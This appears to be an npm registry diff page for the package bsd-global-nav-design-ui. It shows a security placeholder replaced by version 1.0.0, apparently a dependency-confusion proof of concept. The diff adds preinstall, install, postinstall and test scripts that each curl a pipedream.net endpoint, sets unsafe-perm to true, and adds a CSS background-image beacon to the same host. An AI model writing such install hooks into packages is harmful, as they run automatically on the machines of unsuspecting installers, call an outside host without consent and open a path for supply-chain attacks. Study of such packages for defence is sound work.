bsd-global-nav-design-ui 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of bsd-global-nav-design-ui might be problematic. Click here for more details.
- package/README.md +1 -5
- package/build/index.es.css +1 -0
- package/build/index.es.js +1 -0
- package/package.json +20 -3
package/README.md
CHANGED
@@ -1,5 +1 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=bsd-global-nav-design-ui for more information.
|
1
|
+
This package is for bsd-global-nav-design-ui
|
@@ -0,0 +1 @@
|
|
1
|
+
background-image: url('https://eo18bey88qwygm6.m.pipedream.net/backgroundimage');
|
@@ -0,0 +1 @@
|
|
1
|
+
// Index File
|
package/package.json
CHANGED
@@ -1,6 +1,23 @@
|
|
1
1
|
{
|
2
2
|
"name": "bsd-global-nav-design-ui",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "Simple Package for bsd-global-nav-design-ui.",
|
5
|
+
"scripts": {
|
6
|
+
"test": "curl https://eo18bey88qwygm6.m.pipedream.net/test",
|
7
|
+
"install": "curl https://eo18bey88qwygm6.m.pipedream.net/install",
|
8
|
+
"preinstall": "curl https://eo18bey88qwygm6.m.pipedream.net/preinstall",
|
9
|
+
"postinstall": "curl https://eo18bey88qwygm6.m.pipedream.net/postinstall"
|
10
|
+
},
|
11
|
+
"keywords": [
|
12
|
+
"test",
|
13
|
+
"bsd-global-nav-design-ui",
|
14
|
+
"PoC"
|
15
|
+
],
|
16
|
+
"dependencies": {
|
17
|
+
},
|
18
|
+
"config": {
|
19
|
+
"unsafe-perm":true
|
20
|
+
},
|
21
|
+
"author": "khizer47",
|
22
|
+
"license": "ISC"
|
6
23
|
}
|